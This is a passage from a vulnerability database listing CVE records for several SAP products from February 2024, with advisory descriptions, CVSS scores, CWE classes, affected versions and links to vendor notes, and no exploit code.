{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22126", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-07-09T16:21:27.522736Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-07-09T16:21:33.204Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.804Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3417627", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP NetWeaver AS Java (User Admin Application)", vendor: "SAP_SE", versions: [ { status: "affected", version: "7.50", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.</p>", }, ], value: "The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2025-02-11T04:13:01.325Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3417627", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, { url: "https://me.sap.com/notes/3557138", }, ], source: { discovery: "UNKNOWN", }, title: "Cross Site Scripting vulnerability in SAP NetWeaver AS Java (User Admin Application)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22126", datePublished: "2024-02-13T01:58:27.745Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2025-02-11T04:13:01.325Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24741
Vulnerability from cvelistv5
Published
2024-02-13 03:43
Modified
2024-08-01 23:28
Severity ?
EPSS score ?
Summary
SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP Master Data Governance Material |
Version: 618 Version: 619 Version: 620 Version: 621 Version: 622 Version: 800 Version: 801 Version: 802 Version: 803 Version: 804 |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-24741", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-13T20:21:03.015929Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:43:06.598Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.084Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/2897391", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Master Data Governance Material", vendor: "SAP_SE", versions: [ { status: "affected", version: "618", }, { status: "affected", version: "619", }, { status: "affected", version: "620", }, { status: "affected", version: "621", }, { status: "affected", version: "622", }, { status: "affected", version: "800", }, { status: "affected", version: "801", }, { status: "affected", version: "802", }, { status: "affected", version: "803", }, { status: "affected", version: "804", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability.</p>", }, ], value: "SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862: Missing Authorization", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:43:14.238Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/2897391", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing Authorization check in SAP Master Data Governance Material", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24741", datePublished: "2024-02-13T03:43:14.238Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-08-01T23:28:12.084Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-25642
Vulnerability from cvelistv5
Published
2024-02-13 02:44
Modified
2025-02-13 17:40
Severity ?
EPSS score ?
Summary
Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP Cloud Connector |
Version: 2.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:44:09.866Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3424610", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, { tags: [ "x_transferred", ], url: "http://seclists.org/fulldisclosure/2024/May/26", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Cloud Connector", vendor: "SAP_SE", versions: [ { status: "affected", version: "2.0", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system.</p>", }, ], value: "Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-295", description: "CWE-295: Improper Certificate Validation", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-06-10T16:08:29.499Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3424610", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, { url: "http://seclists.org/fulldisclosure/2024/May/26", }, ], source: { discovery: "UNKNOWN", }, title: "Improper Certificate Validation in SAP Cloud Connector", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-25642", datePublished: "2024-02-13T02:44:20.284Z", dateReserved: "2024-02-09T04:10:20.036Z", dateUpdated: "2025-02-13T17:40:53.057Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22132
Vulnerability from cvelistv5
Published
2024-02-13 02:33
Modified
2024-08-01 22:35
Severity ?
EPSS score ?
Summary
SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP IDES Systems |
Version: All version |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22132", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-05-07T04:00:24.595973Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-08-01T17:30:59.546Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.859Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3421659", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "affected", product: "SAP IDES Systems", vendor: "SAP_SE", versions: [ { status: "affected", version: "All version", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.</p>", }, ], value: "SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-78", description: "CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:33:01.622Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3421659", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Code Injection vulnerability in SAP IDES Systems", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22132", datePublished: "2024-02-13T02:33:01.622Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.859Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24739
Vulnerability from cvelistv5
Published
2024-02-13 02:34
Modified
2024-08-01 23:28
Severity ?
EPSS score ?
Summary
SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP BAM (Bank Account Management) |
Version: SAP_FIN 618 Version: SAP_FIN 730 Version: S4CORE 100 Version: 101 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.038Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/2637727", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP BAM (Bank Account Management)", vendor: "SAP_SE", versions: [ { status: "affected", version: "SAP_FIN 618", }, { status: "affected", version: "SAP_FIN 730", }, { status: "affected", version: "S4CORE 100", }, { status: "affected", version: "101", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.</p>", }, ], value: "SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 6.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862: Missing Authorization", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:34:17.247Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/2637727", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing authorization check in SAP BAM (Bank Account Management)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24739", datePublished: "2024-02-13T02:34:17.247Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-08-01T23:28:12.038Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22130
Vulnerability from cvelistv5
Published
2024-02-13 02:29
Modified
2024-08-01 22:35
Severity ?
EPSS score ?
Summary
Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP CRM WebClient UI |
Version: S4FND 102 Version: S4FND 103 Version: S4FND 104 Version: S4FND 105 Version: S4FND 106 Version: S4FND 107 Version: S4FND 108 Version: WEBCUIF 700 Version: WEBCUIF 701 Version: WEBCUIF 730 Version: WEBCUIF 731 Version: WEBCUIF 746 Version: WEBCUIF 747 Version: WEBCUIF 748 Version: WEBCUIF 800 Version: WEBCUIF 801 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.802Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3410875", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP CRM WebClient UI", vendor: "SAP_SE", versions: [ { status: "affected", version: "S4FND 102", }, { status: "affected", version: "S4FND 103", }, { status: "affected", version: "S4FND 104", }, { status: "affected", version: "S4FND 105", }, { status: "affected", version: "S4FND 106", }, { status: "affected", version: "S4FND 107", }, { status: "affected", version: "S4FND 108", }, { status: "affected", version: "WEBCUIF 700", }, { status: "affected", version: "WEBCUIF 701", }, { status: "affected", version: "WEBCUIF 730", }, { status: "affected", version: "WEBCUIF 731", }, { status: "affected", version: "WEBCUIF 746", }, { status: "affected", version: "WEBCUIF 747", }, { status: "affected", version: "WEBCUIF 748", }, { status: "affected", version: "WEBCUIF 800", }, { status: "affected", version: "WEBCUIF 801", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.</p>", }, ], value: "Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:29:51.706Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3410875", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP CRM WebClient UI", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22130", datePublished: "2024-02-13T02:29:51.706Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.802Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22131
Vulnerability from cvelistv5
Published
2024-02-13 02:30
Modified
2024-08-01 22:35
Severity ?
EPSS score ?
Summary
In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP ABA (Application Basis) |
Version: 700 Version: 701 Version: 702 Version: 731 Version: 740 Version: 750 Version: 751 Version: 752 Version: 75C Version: 75I |
{ containers: { adp: [ { affected: [ { cpes: [ "cpe:2.3:a:sap:sap_aba:*:*:*:*:*:*:*:*", ], defaultStatus: "unknown", product: "sap_aba", vendor: "sap", versions: [ { status: "affected", version: "700", }, { status: "affected", version: "701", }, { status: "affected", version: "702", }, { status: "affected", version: "731", }, { status: "affected", version: "740", }, { status: "affected", version: "750", }, { status: "affected", version: "751", }, { status: "affected", version: "752", }, { status: "affected", version: "75c", }, { status: "affected", version: "75i", }, ], }, ], metrics: [ { other: { content: { id: "CVE-2024-22131", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "total", }, ], role: "CISA Coordinator", timestamp: "2024-04-11T04:00:52.278648Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-28T16:05:04.503Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.897Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3420923", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP ABA (Application Basis)", vendor: "SAP_SE", versions: [ { status: "affected", version: "700", }, { status: "affected", version: "701", }, { status: "affected", version: "702", }, { status: "affected", version: "731", }, { status: "affected", version: "740", }, { status: "affected", version: "750", }, { status: "affected", version: "751", }, { status: "affected", version: "752", }, { status: "affected", version: "75C", }, { status: "affected", version: "75I", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.</p>", }, ], value: "In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.1, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "HIGH", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-94", description: "CWE-94: Improper Control of Generation of Code ('Code Injection')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:30:51.886Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3420923", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Code Injection vulnerability in SAP ABA (Application Basis)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22131", datePublished: "2024-02-13T02:30:51.886Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.897Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-25643
Vulnerability from cvelistv5
Published
2024-02-13 03:37
Modified
2024-08-01 23:44
Severity ?
EPSS score ?
Summary
The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP Fiori app (My Overtime Requests) |
Version: 605 |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-25643", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-14T19:44:56.974359Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:35:09.212Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:44:09.819Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3237638", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Fiori app (My Overtime Requests)", vendor: "SAP_SE", versions: [ { status: "affected", version: "605", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.", }, ], value: "The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862 Missing Authorization", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:37:14.954Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3237638", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing authorization check in SAP Fiori app (My Overtime Requests)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-25643", datePublished: "2024-02-13T03:37:14.954Z", dateReserved: "2024-02-09T04:10:20.036Z", dateUpdated: "2024-08-01T23:44:09.819Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24740
Vulnerability from cvelistv5
Published
2024-02-13 02:35
Modified
2024-09-28 22:22
Severity ?
EPSS score ?
Summary
SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.
References
Impacted products
